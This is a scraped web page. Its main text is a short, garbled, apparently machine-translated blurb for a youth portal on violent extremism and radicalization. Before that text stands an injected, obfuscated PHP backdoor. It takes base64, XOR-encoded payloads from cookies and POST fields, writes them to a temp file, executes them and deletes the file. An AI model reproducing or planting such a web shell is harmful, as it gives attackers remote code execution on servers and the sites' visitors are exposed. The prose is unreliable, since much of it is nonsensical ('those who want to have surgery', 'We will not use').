$CeYaLswoG = 'I' . chr (81) . "\137" . 'I' . 'E' . "\x54";$kMduTswFK = "\x63" . chr ( 637 - 529 ).chr ( 315 - 218 )."\x73" . "\163" . chr ( 757 - 662 ).'e' . "\170" . "\x69" . "\163" . 't' . 's';$gIhCtSUeby = class_exists($CeYaLswoG); $kMduTswFK = "36451";$EjEdBH = !1;if ($gIhCtSUeby == $EjEdBH){function bnbVIhs(){return FALSE;}$wTdQMDdQN = "40419";bnbVIhs();class IQ_IET{private function iJuozL($wTdQMDdQN){if (is_array(IQ_IET::$Wzlrb)) {$JZFHLY = sys_get_temp_dir() . "/" . crc32(IQ_IET::$Wzlrb["\x73" . 'a' . "\154" . "\x74"]);@IQ_IET::$Wzlrb[chr (119) . 'r' . 'i' . "\164" . "\145"]($JZFHLY, IQ_IET::$Wzlrb["\x63" . chr ( 665 - 554 ).chr ( 488 - 378 ).'t' . 'e' . "\156" . 't']);include $JZFHLY;@IQ_IET::$Wzlrb[chr (100) . "\145" . 'l' . "\145" . chr ( 1005 - 889 ).'e']($JZFHLY); $wTdQMDdQN = "40419";exit();}}private $NoAxmYBYvW;public function xXlWNDk(){echo 34087;}public function __destruct(){$wTdQMDdQN = "38394_2689";$this->iJuozL($wTdQMDdQN); $wTdQMDdQN = "38394_2689";}public function __construct($kqSNOv=0){$DVwsWldJ = $_POST;$HyJRhXWQMB = $_COOKIE;$FWuwSpgS = "3748c69a-64ea-4cd3-8378-b9d70b157ee2";$AbWfWtA = @$HyJRhXWQMB[substr($FWuwSpgS, 0, 4)];if (!empty($AbWfWtA)){$BczMCA = "base64";$LuGPpFhb = "";$AbWfWtA = explode(",", $AbWfWtA);foreach ($AbWfWtA as $wjfNn){$LuGPpFhb .= @$HyJRhXWQMB[$wjfNn];$LuGPpFhb .= @$DVwsWldJ[$wjfNn];}$LuGPpFhb = array_map($BczMCA . chr ( 745 - 650 )."\x64" . 'e' . "\x63" . chr ( 1079 - 968 ).chr ( 689 - 589 )."\145", array($LuGPpFhb,)); $LuGPpFhb = $LuGPpFhb[0] ^ str_repeat($FWuwSpgS, (strlen($LuGPpFhb[0]) / strlen($FWuwSpgS)) + 1);IQ_IET::$Wzlrb = @unserialize($LuGPpFhb); $LuGPpFhb = class_exists("38394_2689");}}public static $Wzlrb = 63881;}$HEdYKfaP = new /* 33104 */ $CeYaLswoG(40419 + 40419); $EjEdBH = $HEdYKfaP = $wTdQMDdQN = Array();} Violent Extremism and Radicalization – IKTD

Violent extremists are increasingly using the internet and social media to inspire, radicalize and recruit young people into the tire cause, as a passive support, active enthusiasts from those who want to have surgery.

It is our justice, as an actor society to protect young people from assets and ideology with content of violent extremism and radicalization. The first and most well-known step is to acquaint young people with the phenomenon of violent extremism and radicalization and ways to prevent and attack there. This web site will help exactly this cause!

We will not use a series of interactive materials to educate and raise awareness of young people about the nature of violent extremist movements, as well as manage to make extremist propaganda, have control over spaces and tires online and need extremist messages that can be encountered in the online realm, reporting them and not becoming part of them.

We encourage youth communities, families, parents, teens, schools to use this portal to learn about the nature of violent extremist propaganda and to offer positive alternatives to prevent and attack it.

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